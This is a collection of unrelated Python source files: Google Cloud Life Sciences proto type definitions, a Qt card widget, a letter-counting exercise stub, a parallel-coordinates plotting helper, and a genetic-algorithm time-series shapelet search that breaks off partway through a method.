'google-' are reserved for use by Google. Labels applied at creation time to the VM. Applied on a best-effort basis to attached disk resources shortly after VM creation. disks (Sequence[google.cloud.lifesciences_v2beta.types.Disk]): The list of disks to create and attach to the VM. Specify either the ``volumes[]`` field or the ``disks[]`` field, but not both. network (google.cloud.lifesciences_v2beta.types.Network): The VM network configuration. accelerators (Sequence[google.cloud.lifesciences_v2beta.types.Accelerator]): The list of accelerators to attach to the VM. service_account (google.cloud.lifesciences_v2beta.types.ServiceAccount): The service account to install on the VM. This account does not need any permissions other than those required by the pipeline. boot_disk_size_gb (int): The size of the boot disk, in GB. The boot disk must be large enough to accommodate all of the Docker images from each action in the pipeline at the same time. If not specified, a small but reasonable default value is used. cpu_platform (str): The CPU platform to request. An instance based on a newer platform can be allocated, but never one with fewer capabilities. The value of this parameter must be a valid Compute Engine CPU platform name (such as "Intel Skylake"). This parameter is only useful for carefully optimized work loads where the CPU platform has a significant impact. For more information about the effect of this parameter, see https://cloud.google.com/compute/docs/instances/specify- min-cpu-platform. boot_image (str): The host operating system image to use. Currently, only Container-Optimized OS images can be used. The default value is ``projects/cos-cloud/global/images/family/cos-stable``, which selects the latest stable release of Container-Optimized OS. This option is provided to allow testing against the beta release of the operating system to ensure that the new version does not interact negatively with production pipelines. To test a pipeline against the beta release of Container-Optimized OS, use the value ``projects/cos-cloud/global/images/family/cos-beta``. nvidia_driver_version (str): The NVIDIA driver version to use when attaching an NVIDIA GPU accelerator. The version specified here must be compatible with the GPU libraries contained in the container being executed, and must be one of the drivers hosted in the ``nvidia-drivers-us-public`` bucket on Google Cloud Storage. enable_stackdriver_monitoring (bool): Whether Stackdriver monitoring should be enabled on the VM. docker_cache_images (Sequence[str]): The Compute Engine Disk Images to use as a Docker cache. The disks will be mounted into the Docker folder in a way that the images present in the cache will not need to be pulled. The digests of the cached images must match those of the tags used or the latest version will still be pulled. The root directory of the ext4 image must contain ``image`` and ``overlay2`` directories copied from the Docker directory of a VM where the desired Docker images have already been pulled. Any images pulled that are not cached will be stored on the first cache disk instead of the boot disk. Only a single image is supported. volumes (Sequence[google.cloud.lifesciences_v2beta.types.Volume]): The list of disks and other storage to create or attach to the VM. Specify either the ``volumes[]`` field or the ``disks[]`` field, but not both. """ machine_type = proto.Field( proto.STRING, number=1, ) preemptible = proto.Field( proto.BOOL, number=2, ) labels = proto.MapField( proto.STRING, proto.STRING, number=3, ) disks = proto.RepeatedField( proto.MESSAGE, number=4, message='Disk', ) network = proto.Field( proto.MESSAGE, number=5, message='Network', ) accelerators = proto.RepeatedField( proto.MESSAGE, number=6, message='Accelerator', ) service_account = proto.Field( proto.MESSAGE, number=7, message='ServiceAccount', ) boot_disk_size_gb = proto.Field( proto.INT32, number=8, ) cpu_platform = proto.Field( proto.STRING, number=9, ) boot_image = proto.Field( proto.STRING, number=10, ) nvidia_driver_version = proto.Field( proto.STRING, number=11, ) enable_stackdriver_monitoring = proto.Field( proto.BOOL, number=12, ) docker_cache_images = proto.RepeatedField( proto.STRING, number=13, ) volumes = proto.RepeatedField( proto.MESSAGE, number=14, message='Volume', ) class ServiceAccount(proto.Message): r"""Carries information about a Google Cloud service account. Attributes: email (str): Email address of the service account. If not specified, the default Compute Engine service account for the project will be used. scopes (Sequence[str]): List of scopes to be enabled for this service account on the VM, in addition to the cloud- platform API scope that will be added by default. """ email = proto.Field( proto.STRING, number=1, ) scopes = proto.RepeatedField( proto.STRING, number=2, ) class Accelerator(proto.Message): r"""Carries information about an accelerator that can be attached to a VM. Attributes: type_ (str): The accelerator type string (for example, "nvidia-tesla-k80"). Only NVIDIA GPU accelerators are currently supported. If an NVIDIA GPU is attached, the required runtime libraries will be made available to all containers under ``/usr/local/nvidia``. The driver version to install must be specified using the NVIDIA driver version parameter on the virtual machine specification. Note that attaching a GPU increases the worker VM startup time by a few minutes. count (int): How many accelerators of this type to attach. """ type_ = proto.Field( proto.STRING, number=1, ) count = proto.Field( proto.INT64, number=2, ) class Network(proto.Message): r"""VM networking options. Attributes: network (str): The network name to attach the VM's network interface to. The value will be prefixed with ``global/networks/`` unless it contains a ``/``, in which case it is assumed to be a fully specified network resource URL. If unspecified, the global default network is used. use_private_address (bool): If set to true, do not attach a public IP address to the VM. Note that without a public IP address, additional configuration is required to allow the VM to access Google services. See https://cloud.google.com/vpc/docs/configure- private-google-access for more information. subnetwork (str): If the specified network is configured for custom subnet creation, the name of the subnetwork to attach the instance to must be specified here. The value is prefixed with ``regions/*/subnetworks/`` unless it contains a ``/``, in which case it is assumed to be a fully specified subnetwork resource URL. If the ``*`` character appears in the value, it is replaced with the region that the virtual machine has been allocated in. """ network = proto.Field( proto.STRING, number=1, ) use_private_address = proto.Field( proto.BOOL, number=2, ) subnetwork = proto.Field( proto.STRING, number=3, ) class Disk(proto.Message): r"""Carries information about a disk that can be attached to a VM. See https://cloud.google.com/compute/docs/disks/performance for more information about disk type, size, and performance considerations. Specify either [``Volume``][google.cloud.lifesciences.v2beta.Volume] or [``Disk``][google.cloud.lifesciences.v2beta.Disk], but not both. Attributes: name (str): A user-supplied name for the disk. Used when mounting the disk into actions. The name must contain only upper and lowercase alphanumeric characters and hyphens and cannot start with a hyphen. size_gb (int): The size, in GB, of the disk to attach. If the size is not specified, a default is chosen to ensure reasonable I/O performance. If the disk type is specified as ``local-ssd``, multiple local drives are automatically combined to provide the requested size. Note, however, that each physical SSD is 375GB in size, and no more than 8 drives can be attached to a single instance. type_ (str): The Compute Engine disk type. If unspecified, ``pd-standard`` is used. source_image (str): An optional image to put on the disk before attaching it to the VM. """ name = proto.Field( proto.STRING, number=1, ) size_gb = proto.Field( proto.INT32, number=2, ) type_ = proto.Field( proto.STRING, number=3, ) source_image = proto.Field( proto.STRING, number=4, ) class Volume(proto.Message): r"""Carries information about storage that can be attached to a VM. Specify either [``Volume``][google.cloud.lifesciences.v2beta.Volume] or [``Disk``][google.cloud.lifesciences.v2beta.Disk], but not both. Attributes: volume (str): A user-supplied name for the volume. Used when mounting the volume into [``Actions``][google.cloud.lifesciences.v2beta.Action]. The name must contain only upper and lowercase alphanumeric characters and hyphens and cannot start with a hyphen. persistent_disk (google.cloud.lifesciences_v2beta.types.PersistentDisk): Configuration for a persistent disk. existing_disk (google.cloud.lifesciences_v2beta.types.ExistingDisk): Configuration for a existing disk. nfs_mount (google.cloud.lifesciences_v2beta.types.NFSMount): Configuration for an NFS mount. """ volume = proto.Field( proto.STRING, number=1, ) persistent_disk = proto.Field( proto.MESSAGE, number=2, oneof='storage', message='PersistentDisk', ) existing_disk = proto.Field( proto.MESSAGE, number=3, oneof='storage', message='ExistingDisk', ) nfs_mount = proto.Field( proto.MESSAGE, number=4, oneof='storage', message='NFSMount', ) class PersistentDisk(proto.Message): r"""Configuration for a persistent disk to be attached to the VM. See https://cloud.google.com/compute/docs/disks/performance for more information about disk type, size, and performance considerations. Attributes: size_gb (int): The size, in GB, of the disk to attach. If the size is not specified, a default is chosen to ensure reasonable I/O performance. If the disk type is specified as ``local-ssd``, multiple local drives are automatically combined to provide the requested size. Note, however, that each physical SSD is 375GB in size, and no more than 8 drives can be attached to a single instance. type_ (str): The Compute Engine disk type. If unspecified, ``pd-standard`` is used. source_image (str): An image to put on the disk before attaching it to the VM. """ size_gb = proto.Field( proto.INT32, number=1, ) type_ = proto.Field( proto.STRING, number=2, ) source_image = proto.Field( proto.STRING, number=3, ) class ExistingDisk(proto.Message): r"""Configuration for an existing disk to be attached to the VM. Attributes: disk (str): If ``disk`` contains slashes, the Cloud Life Sciences API assumes that it is a complete URL for the disk. If ``disk`` does not contain slashes, the Cloud Life Sciences API assumes that the disk is a zonal disk and a URL will be generated of the form ``zones/<zone>/disks/<disk>``, where ``<zone>`` is the zone in which the instance is allocated. The disk must be ext4 formatted. If all ``Mount`` references to this disk have the ``read_only`` flag set to true, the disk will be attached in ``read-only`` mode and can be shared with other instances. Otherwise, the disk will be available for writing but cannot be shared. """ disk = proto.Field( proto.STRING, number=1, ) class NFSMount(proto.Message): r"""Configuration for an ``NFSMount`` to be attached to the VM. Attributes: target (str): A target NFS mount. The target must be specified as \`address:/mount". """ target = proto.Field( proto.STRING, number=1, ) class Metadata(proto.Message): r"""Carries information about the pipeline execution that is returned in the long running operation's metadata field. Attributes: pipeline (google.cloud.lifesciences_v2beta.types.Pipeline): The pipeline this operation represents. labels (Sequence[google.cloud.lifesciences_v2beta.types.Metadata.LabelsEntry]): The user-defined labels associated with this operation. events (Sequence[google.cloud.lifesciences_v2beta.types.Event]): The list of events that have happened so far during the execution of this operation. create_time (google.protobuf.timestamp_pb2.Timestamp): The time at which the operation was created by the API. start_time (google.protobuf.timestamp_pb2.Timestamp): The first time at which resources were allocated to execute the pipeline. end_time (google.protobuf.timestamp_pb2.Timestamp): The time at which execution was completed and resources were cleaned up. pub_sub_topic (str): The name of the Cloud Pub/Sub topic where notifications of operation status changes are sent. """ pipeline = proto.Field( proto.MESSAGE, number=1, message='Pipeline', ) labels = proto.MapField( proto.STRING, proto.STRING, number=2, ) events = proto.RepeatedField( proto.MESSAGE, number=3, message='Event', ) create_time = proto.Field( proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp, ) start_time = proto.Field( proto.MESSAGE, number=5, message=timestamp_pb2.Timestamp, ) end_time = proto.Field( proto.MESSAGE, number=6, message=timestamp_pb2.Timestamp, ) pub_sub_topic = proto.Field( proto.STRING, number=7, ) class Event(proto.Message): r"""Carries information about events that occur during pipeline execution. Attributes: timestamp (google.protobuf.timestamp_pb2.Timestamp): The time at which the event occurred. description (str): A human-readable description of the event. Note that these strings can change at any time without notice. Any application logic must use the information in the ``details`` field. delayed (google.cloud.lifesciences_v2beta.types.DelayedEvent): See [google.cloud.lifesciences.v2beta.DelayedEvent][google.cloud.lifesciences.v2beta.DelayedEvent]. worker_assigned (google.cloud.lifesciences_v2beta.types.WorkerAssignedEvent): See [google.cloud.lifesciences.v2beta.WorkerAssignedEvent][google.cloud.lifesciences.v2beta.WorkerAssignedEvent]. worker_released (google.cloud.lifesciences_v2beta.types.WorkerReleasedEvent): See [google.cloud.lifesciences.v2beta.WorkerReleasedEvent][google.cloud.lifesciences.v2beta.WorkerReleasedEvent]. pull_started (google.cloud.lifesciences_v2beta.types.PullStartedEvent): See [google.cloud.lifesciences.v2beta.PullStartedEvent][google.cloud.lifesciences.v2beta.PullStartedEvent]. pull_stopped (google.cloud.lifesciences_v2beta.types.PullStoppedEvent): See [google.cloud.lifesciences.v2beta.PullStoppedEvent][google.cloud.lifesciences.v2beta.PullStoppedEvent]. container_started (google.cloud.lifesciences_v2beta.types.ContainerStartedEvent): See [google.cloud.lifesciences.v2beta.ContainerStartedEvent][google.cloud.lifesciences.v2beta.ContainerStartedEvent]. container_stopped (google.cloud.lifesciences_v2beta.types.ContainerStoppedEvent): See [google.cloud.lifesciences.v2beta.ContainerStoppedEvent][google.cloud.lifesciences.v2beta.ContainerStoppedEvent]. container_killed (google.cloud.lifesciences_v2beta.types.ContainerKilledEvent): See [google.cloud.lifesciences.v2beta.ContainerKilledEvent][google.cloud.lifesciences.v2beta.ContainerKilledEvent]. unexpected_exit_status (google.cloud.lifesciences_v2beta.types.UnexpectedExitStatusEvent): See [google.cloud.lifesciences.v2beta.UnexpectedExitStatusEvent][google.cloud.lifesciences.v2beta.UnexpectedExitStatusEvent]. failed (google.cloud.lifesciences_v2beta.types.FailedEvent): See [google.cloud.lifesciences.v2beta.FailedEvent][google.cloud.lifesciences.v2beta.FailedEvent]. """ timestamp = proto.Field( proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp, ) description = proto.Field( proto.STRING, number=2, ) delayed = proto.Field( proto.MESSAGE, number=17, oneof='details', message='DelayedEvent', ) worker_assigned = proto.Field( proto.MESSAGE, number=18, oneof='details', message='WorkerAssignedEvent', ) worker_released = proto.Field( proto.MESSAGE, number=19, oneof='details', message='WorkerReleasedEvent', ) pull_started = proto.Field( proto.MESSAGE, number=20, oneof='details', message='PullStartedEvent', ) pull_stopped = proto.Field( proto.MESSAGE, number=21, oneof='details', message='PullStoppedEvent', ) container_started = proto.Field( proto.MESSAGE, number=22, oneof='details', message='ContainerStartedEvent', ) container_stopped = proto.Field( proto.MESSAGE, number=23, oneof='details', message='ContainerStoppedEvent', ) container_killed = proto.Field( proto.MESSAGE, number=24, oneof='details', message='ContainerKilledEvent', ) unexpected_exit_status = proto.Field( proto.MESSAGE, number=25, oneof='details', message='UnexpectedExitStatusEvent', ) failed = proto.Field( proto.MESSAGE, number=26, oneof='details', message='FailedEvent', ) class DelayedEvent(proto.Message): r"""An event generated whenever a resource limitation or transient error delays execution of a pipeline that was otherwise ready to run. Attributes: cause (str): A textual description of the cause of the delay. The string can change without notice because it is often generated by another service (such as Compute Engine). metrics (Sequence[str]): If the delay was caused by a resource shortage, this field lists the Compute Engine metrics that are preventing this operation from running (for example, ``CPUS`` or ``INSTANCES``). If the particular metric is not known, a single ``UNKNOWN`` metric will be present. """ cause = proto.Field( proto.STRING, number=1, ) metrics = proto.RepeatedField( proto.STRING, number=2, ) class WorkerAssignedEvent(proto.Message): r"""An event generated after a worker VM has been assigned to run the pipeline. Attributes: zone (str): The zone the worker is running in. instance (str): The worker's instance name. machine_type (str): The machine type that was assigned for the worker. """ zone = proto.Field( proto.STRING, number=1, ) instance = proto.Field( proto.STRING, number=2, ) machine_type = proto.Field( proto.STRING, number=3, ) class WorkerReleasedEvent(proto.Message): r"""An event generated when the worker VM that was assigned to the pipeline has been released (deleted). Attributes: zone (str): The zone the worker was running in. instance (str): The worker's instance name. """ zone = proto.Field( proto.STRING, number=1, ) instance = proto.Field( proto.STRING, number=2, ) class PullStartedEvent(proto.Message): r"""An event generated when the worker starts pulling an image. Attributes: image_uri (str): The URI of the image that was pulled. """ image_uri = proto.Field( proto.STRING, number=1, ) class PullStoppedEvent(proto.Message): r"""An event generated when the worker stops pulling an image. Attributes: image_uri (str): The URI of the image that was pulled. """ image_uri = proto.Field( proto.STRING, number=1, ) class ContainerStartedEvent(proto.Message): r"""An event generated when a container starts. Attributes: action_id (int): The numeric ID of the action that started this container. port_mappings (Sequence[google.cloud.lifesciences_v2beta.types.ContainerStartedEvent.PortMappingsEntry]): The container-to-host port mappings installed for this container. This set will contain any ports exposed using the ``PUBLISH_EXPOSED_PORTS`` flag as well as any specified in the ``Action`` definition. ip_address (str): The public IP address that can be used to connect to the container. This field is only populated when at least one port mapping is present. If the instance was created with a private address, this field will be empty even if port mappings exist. """ action_id = proto.Field( proto.INT32, number=1, ) port_mappings = proto.MapField( proto.INT32, proto.INT32, number=2, ) ip_address = proto.Field( proto.STRING, number=3, ) class ContainerStoppedEvent(proto.Message): r"""An event generated when a container exits. Attributes: action_id (int): The numeric ID of the action that started this container. exit_status (int): The exit status of the container. stderr (str): The tail end of any content written to standard error by the container. If the content emits large amounts of debugging noise or contains sensitive information, you can prevent the content from being printed by setting the ``DISABLE_STANDARD_ERROR_CAPTURE`` flag. Note that only a small amount of the end of the stream is captured here. The entire stream is stored in the ``/google/logs`` directory mounted into each action, and can be copied off the machine as described elsewhere. """ action_id = proto.Field( proto.INT32, number=1, ) exit_status = proto.Field( proto.INT32, number=2, ) stderr = proto.Field( proto.STRING, number=3, ) class UnexpectedExitStatusEvent(proto.Message): r"""An event generated when the execution of a container results in a non-zero exit status that was not otherwise ignored. Execution will continue, but only actions that are flagged as ``ALWAYS_RUN`` will be executed. Other actions will be skipped. Attributes: action_id (int): The numeric ID of the action that started the container. exit_status (int): The exit status of the container. """ action_id = proto.Field( proto.INT32, number=1, ) exit_status = proto.Field( proto.INT32, number=2, ) class ContainerKilledEvent(proto.Message): r"""An event generated when a container is forcibly terminated by the worker. Currently, this only occurs when the container outlives the timeout specified by the user. Attributes: action_id (int): The numeric ID of the action that started the container. """ action_id = proto.Field( proto.INT32, number=1, ) class FailedEvent(proto.Message): r"""An event generated when the execution of a pipeline has failed. Note that other events can continue to occur after this event. Attributes: code (google.rpc.code_pb2.Code): The Google standard error code that best describes this failure. cause (str): The human-readable description of the cause of the failure. """ code = proto.Field( proto.ENUM, number=1, enum=code_pb2.Code, ) cause = proto.Field( proto.STRING, number=2, ) __all__ = tuple(sorted(__protobuf__.manifest))
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- ################################################################### # Author: Mu yanru # Date : 2019.2 # Email : muyanru345@163.com ################################################################### from dayu_widgets.label import MLabel from dayu_widgets.tool_button import MToolButton from dayu_widgets.avatar import MAvatar from dayu_widgets.divider import MDivider from dayu_widgets import dayu_theme from dayu_widgets.mixin import hover_shadow_mixin, cursor_mixin from dayu_widgets.qt import QWidget, QVBoxLayout, QHBoxLayout, QLabel, QFormLayout, QSize, Qt @hover_shadow_mixin @cursor_mixin class MCard(QWidget): def __init__(self, title=None, image=None, size=None, extra=None, type=None, parent=None): super(MCard, self).__init__(parent=parent) self.setAttribute(Qt.WA_StyledBackground) self.setProperty('border', False) size = size or dayu_theme.default_size map_label = { dayu_theme.large: (MLabel.H2Level, 20), dayu_theme.medium: (MLabel.H3Level, 15), dayu_theme.small: (MLabel.H4Level, 10), } self._title_label = MLabel(text=title) self._title_label.set_dayu_level(map_label.get(size)[0]) padding = map_label.get(size)[-1] self._title_layout = QHBoxLayout() self._title_layout.setContentsMargins(padding, padding, padding, padding) if image: self._title_icon = MAvatar() self._title_icon.set_dayu_image(image) self._title_icon.set_dayu_size(size) self._title_layout.addWidget(self._title_icon) self._title_layout.addWidget(self._title_label) self._title_layout.addStretch() if extra: self._extra_button = MToolButton().icon_only().svg('more.svg') self._title_layout.addWidget(self._extra_button) self._content_layout = QVBoxLayout() self._main_lay = QVBoxLayout() self._main_lay.setSpacing(0) self._main_lay.setContentsMargins(1, 1, 1, 1) if title: self._main_lay.addLayout(self._title_layout) self._main_lay.addWidget(MDivider()) self._main_lay.addLayout(self._content_layout) self.setLayout(self._main_lay) def get_more_button(self): return self._extra_button def set_widget(self, widget): self._content_layout.addWidget(widget) def border(self): self.setProperty('border', True) self.style().polish(self) return self @hover_shadow_mixin @cursor_mixin class MMeta(QWidget): def __init__(self, cover=None, avatar=None, title=None, description=None, extra=False, parent=None): super(MMeta, self).__init__(parent) self.setAttribute(Qt.WA_StyledBackground) self._cover_label = QLabel() self._avatar = MAvatar() self._title_label = MLabel().h4() self._description_label = MLabel().secondary() self._description_label.setWordWrap(True) self._description_label.set_elide_mode(Qt.ElideRight) self._title_layout = QHBoxLayout() self._title_layout.addWidget(self._title_label) self._title_layout.addStretch() self._extra_button = MToolButton(parent=self).icon_only().svg('more.svg') self._title_layout.addWidget(self._extra_button) self._extra_button.setVisible(extra) content_lay = QFormLayout() content_lay.setContentsMargins(5, 5, 5, 5) content_lay.addRow(self._avatar, self._title_layout) content_lay.addRow(self._description_label) self._button_layout = QHBoxLayout() main_lay = QVBoxLayout() main_lay.setSpacing(0) main_lay.setContentsMargins(1, 1, 1, 1) main_lay.addWidget(self._cover_label) main_lay.addLayout(content_lay) main_lay.addLayout(self._button_layout) main_lay.addStretch() self.setLayout(main_lay) self._cover_label.setFixedSize(QSize(200, 200)) # self.setFixedWidth(200) def get_more_button(self): return self._extra_button def setup_data(self, data_dict): if data_dict.get('title'): self._title_label.setText(data_dict.get('title')) self._title_label.setVisible(True) else: self._title_label.setVisible(False) if data_dict.get('description'): self._description_label.setText(data_dict.get('description')) self._description_label.setVisible(True) else: self._description_label.setVisible(False) if data_dict.get('avatar'): self._avatar.set_dayu_image(data_dict.get('avatar')) self._avatar.setVisible(True) else: self._avatar.setVisible(False) if data_dict.get('cover'): fixed_height = self._cover_label.width() self._cover_label.setPixmap( data_dict.get('cover').scaledToWidth(fixed_height, Qt.SmoothTransformation)) self._cover_label.setVisible(True) else: self._cover_label.setVisible(False)
nilq/baby-python
python
input = "hello my name is sparta" def find_max_occurred_alphabet(string): alphabet_occurrence_array = [0] * 26 for char in string: if not char.isalpha(): continue arr_index = ord(char) - ord("a") alphabet_occurrence_array[arr_index] += 1 result = find_max_occurred_alphabet(input) print(result)
nilq/baby-python
python
import itertools import numpy as np from sklearn.preprocessing import scale import matplotlib.pyplot as plt from matplotlib import collections as mc # TODO: document it and wrap it as pip package, make ipynb example def get_cmap(n, name='hsv'): """ Returns a function that maps each index in 0, 1, ..., n-1 to a distinct RGB color; the keyword argument name must be a standard mpl colormap name. """ return plt.cm.get_cmap(name, n + 1) # +1 otherwise last color is almost like first one def get_y_min_max(nparr): """ takes the min and max value of a numpy array and adds 5% of the length of (min, max) to the min and to the max """ ymin, ymax = np.amin(nparr), np.amax(nparr) length = ymax - ymin ymin -= 0.05 * length ymax += 0.05 * length return ymin, ymax def get_paracoord_plot(values, labels=None, color_dict=None, save_path=None, format='png', dim=(100, 50), linewidths=1, set_legend=False, box=False, show_vertical_axis=True, ylims=None, do_scale=None, show=True): """ build parallel coordinates image corresponding to `values` :param values: 2-dimensional numpy array :param labels: optional, array containing labels for each row of `values` :param color_dict: dict, optional, ignored if ` labels` not provided. {label -> color} dict. If `labels` is provided but not `color_dict`, the color of each label will be automatically chosen :param save_path: path to the file where the resulting image will be stored. If not provided, image will not be stored :param format: str. format of the saved image (if saved), must belong to ['png', 'jpg', 'svg'] :param dim: (int, int), dimension (in pixels) of the resulting image (for some reasons, the persisted images will not have exactly this size) :param linewidths: int, width (int px) of the plotted line(s) :param set_legend: boolean, optional, ignored if `labels`not provided. If to set a color legend for the labels or not :param box: boolean. If to set a frame (x-axis, y-axis etc.) for the resulting image :param show_vertical_axis: boolean. If to plot the vertical axis of the coordinates :param ylims: (ymin, ymax). If not provided, will be set to the result to `get_y_min_nax(values) :param do_scale: boolean. If True, `ylims` is ignored and `values` are centered (vertically) around their mean with std deviation of 1 :param show: boolean. If to show the image though it is saved. If the image is not saved then it is shown anyway. :return: parallel coordinates image corresponding to `values` """ dpi = 100 figsize = (dim[0] / dpi, dim[1] / dpi) fig, ax = plt.subplots(figsize=figsize, dpi=dpi) segments = [[(i, values[j, i]), (i + 1, values[j, i + 1])] for j in range(values.shape[0]) for i in range(values.shape[1] - 1)] if labels is not None: labels = np.array(labels) distinct_labels = list(set(labels)) assert labels.shape[0] == values.shape[0], 'there must be as much labels as rows in values, ' \ 'here: {} labels for {} rows in values'.format(labels.shape[0], values.shape[0]) if color_dict is not None: assert set(list(labels)) == set(color_dict.keys()), 'the keys of color_dict and the labels must be the same' else: cmap = get_cmap(len(distinct_labels)) color_dict = {distinct_labels[i]: cmap(i) for i in range(len(distinct_labels))} colors = list(itertools.chain.from_iterable([[color_dict[l]] * (values.shape[1] - 1) for l in list(labels)])) lcs = [] for color_value in color_dict.values(): # Divide segments by color segments_color = [segments[i] for i in range(len(segments)) if colors[i] == color_value] lc = mc.LineCollection(segments_color, linewidths=linewidths, colors=color_value) ax.add_collection(lc) lcs.append(lc) if set_legend: ax.legend(lcs, distinct_labels, bbox_to_anchor=(1, 1)) else: lc = mc.LineCollection(segments, linewidths=linewidths, colors='b') ax.add_collection(lc) ax.autoscale() if do_scale: values = scale(values, axis=0, copy=True) if ylims is None or do_scale: ymin, ymax = get_y_min_max(values) else: ymin, ymax = ylims[0], ylims[1] if show_vertical_axis: for i in range(values.shape[1]): ax.axvline(x=i, ymin=ymin, ymax=ymax, color='k') if not box: plt.tick_params(top='off', bottom='off', left='off', right='off', labelleft='off', labelbottom='off') plt.box(False) plt.xlim(0, values.shape[1]) plt.ylim(ymin, ymax) if save_path is not None: assert format in ['png', 'jpg', 'svg'], 'format must belong to [\'png\', \'jpg\', \'svg\']' plt.savefig(save_path, bbox_inches='tight', format=format, pad_inches=0) if show: plt.show() else: plt.show() # Clear the current axes. plt.cla() # Clear the current figure. plt.clf() # Closes all the figure windows. plt.close('all')
nilq/baby-python
python
import numpy as np import pandas as pd import time import os import sys from copy import copy from fastdtw import fastdtw from scipy import interpolate from scipy.stats import levy, zscore, mode from sklearn.metrics import silhouette_score from sklearn.metrics.pairwise import * from scipy.spatial.distance import * from sklearn.linear_model import LogisticRegression from sklearn.cluster import DBSCAN def pairwise_fastdtw(X, **kwargs): X = [list(enumerate(pattern)) for pattern in X] triu = [fastdtw(X[i], X[j], **kwargs)[0] if i != j else 0 for i in range(len(X)) for j in range(i, len(X))] matrix = np.zeros([len(X)] * 2) matrix[np.triu_indices(len(X))] = triu matrix += np.tril(matrix.T, -1) return matrix class individual: def __init__(self, start: list = None, slen: list = None): if start is None: start = [] if slen is None: slen = [] self.start = start self.slen = slen self.cluster = None class genshapelet: def __init__(self, ts_path: 'path to file', nsegments, min_support, smin, smax, output_folder=''): self.ts = pd.read_csv(ts_path, header=None) self.ts_path = ts_path self.nsegments = nsegments if self.nsegments is None: self.nsegments = int(len(self.ts) / (2 * smax) + 1) if self.nsegments < 2: sys.exit('nsegments must be at least 2 for computing clustering quality') self.min_support = min_support self.smin = smin self.smax = smax if os.path.exists(output_folder): pass elif os.access(output_folder, os.W_OK): pass else: sys.exit('output_folder not createable.') self.output_folder = output_folder self.probability = 2 / self.nsegments self.random_walk = False def run(self, popsize: dict(type=int, help='> 3, should be odd'), sigma: dict(type=float, help='mutation factor'), t_max, pairwise_distmeasures=[ (pairwise_distances, {'metric': 'cosine'}), (pairwise_distances, {'metric': 'chebyshev'}), (pairwise_distances, {'metric': 'euclidean'}), (pairwise_fastdtw, {'dist': euclidean})], fusion=True, notes=''): # For pairwise_distances # From scikit-learn: ['cityblock', 'cosine', 'euclidean', pairwise_distancesl1', 'l2', 'manhattan']. # From scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev', 'correlation', 'dice', 'hamming', # 'jaccard', 'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto', 'russellrao', # 'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean', 'yule'] print('-->') # print('working with ' + str(self.nsegments) + ' windows') t_max *= 60 t_start = time.time() population, fitness = [], [] for i in range(0, popsize): population.append(self.make_individual()) fitness.append(self.evaluate(population[i], pairwise_distmeasures, fusion)) fitness_curve = [] best_fit = -np.inf iterations = 0 t_elapsed = time.time() - t_start while(t_elapsed < t_max): order = np.argsort(fitness)[::-1] ix_maxfitness = order[0] if(fitness[ix_maxfitness] > best_fit): best_fit = fitness[ix_maxfitness] fitness_curve.append((t_elapsed, iterations, best_fit)) # print((t_elapsed, iterations, best_fit)) # if(iterations % 500) == 0: # print((t_elapsed, iterations, best_fit)) new_population = [] new_population.append(population[ix_maxfitness]) # elite fitness[0] = fitness[ix_maxfitness] if self.random_walk: for i in range(1, popsize): new_population.append(self.make_individual()) fitness[i] = self.evaluate(population[i], pairwise_distmeasures, fusion) else: for i in range(1, int(popsize / 2), 2): new_population.append(population[order[i]]) new_population.append(population[order[i + 1]]) self.crossover(new_population[i], new_population[i + 1]) self.mutate(new_population[i], sigma) self.mutate(new_population[i + 1], sigma) fitness[i] = self.evaluate(new_population[i], pairwise_distmeasures, fusion) fitness[i + 1] = self.evaluate(new_population[i + 1], pairwise_distmeasures, fusion) for i in range(int(popsize / 2), popsize): new_population.append(self.make_individual()) fitness[i] = self.evaluate(new_population[i], pairwise_distmeasures, fusion) population = new_population iterations += 1 t_elapsed = time.time() - t_start ix_maxfitness = np.argmax(fitness) fitness_curve.append((t_max, iterations, fitness[ix_maxfitness])) # print('t_elapsed: ' + str(t_elapsed)) # print('iterations: ' + str(iterations)) # print('fitness: ' + str(fitness[ix_maxfitness])) name = self.make_filename(popsize, sigma, t_max, notes) self.write_shapelets(population[ix_maxfitness], name) self.write_fitness(fitness_curve, name) # print(population[ix_maxfitness].start) # print(population[ix_maxfitness].slen) # print(population[ix_maxfitness].cluster) # print(self.evaluate(population[ix_maxfitness], pairwise_distmeasures, fusion)) print('--<') return 0 def evaluate(self, x: individual, pairwise_distmeasures, fusion): # get patterns from individual patterns, classlabels = [], [] for i in range(len(x.start)): df = self.ts.loc[x.start[i]:x.start[i] + x.slen[i] - 1, :] classlabels.append(mode(df.loc[:, [0]])[0][0][0]) # xD df = df.loc[:, [1]].apply(zscore).fillna(0) # consider extending for multivariate ts upsampled_ix = np.linspace(0, len(df) - 1, self.smax) # upsampling new_values = interpolate.interp1d(np.arange(len(df)), np.array(df).flatten(), kind='cubic')(upsampled_ix) patterns.append(new_values) patterns = np.array(patterns) classlabels = np.array(classlabels) # print('patterns\n' + str(patterns)) # DEBUG # print('classlabels ' + str(classlabels)) # DEBUG distances = {} cols = len(patterns) for measure, params in pairwise_distmeasures: distances[str(measure) + str(params)] = measure(patterns, **params)[np.triu_indices(cols)] distances = pd.DataFrame(distances) if fusion: clf = LogisticRegression() different_class = np.zeros([cols] * 2) different_class[classlabels[:, None] != classlabels] = 1 different_class = different_class[np.triu_indices(cols)] if 1 in different_class: clf.fit(distances, different_class) combined_distance = clf.predict_proba(distances)[:, 1] else: return -np.inf dist_matrix = np.zeros([cols] * 2) dist_matrix[np.triu_indices(cols)] = combined_distance dist_matrix += np.tril(dist_matrix.T, -1) else: measure, params = pairwise_distmeasures[0] dist_matrix = measure(patterns, **params) # print('dist_matrix\n' + str(dist_matrix)) # DEBUG # epsilon! consider: eps=dist_matrix.mean()/1.5 db = DBSCAN(eps=dist_matrix.mean(), min_samples=self.min_support, metric='precomputed', n_jobs=-1).fit(dist_matrix) x.cluster = db.labels_ try: fitness = silhouette_score(dist_matrix, x.cluster) except Exception as e: fitness = -np.inf # print(fitness) # DEBUG return fitness def validate(self, x): order = np.argsort(x.start) for i in range(len(order)): for j in range(1, len(order) - i): if(x.start[order[i + j]] - x.start[order[i]] > self.smax): break if(x.start[order[i]] + x.slen[order[i]] > x.start[order[i + j]]): return False return True def mutate(self, x, sigma): for i in range(len(x.start)): if(np.random.uniform() < self.probability): tmp_start, tmp_slen = copy(x.start[i]), 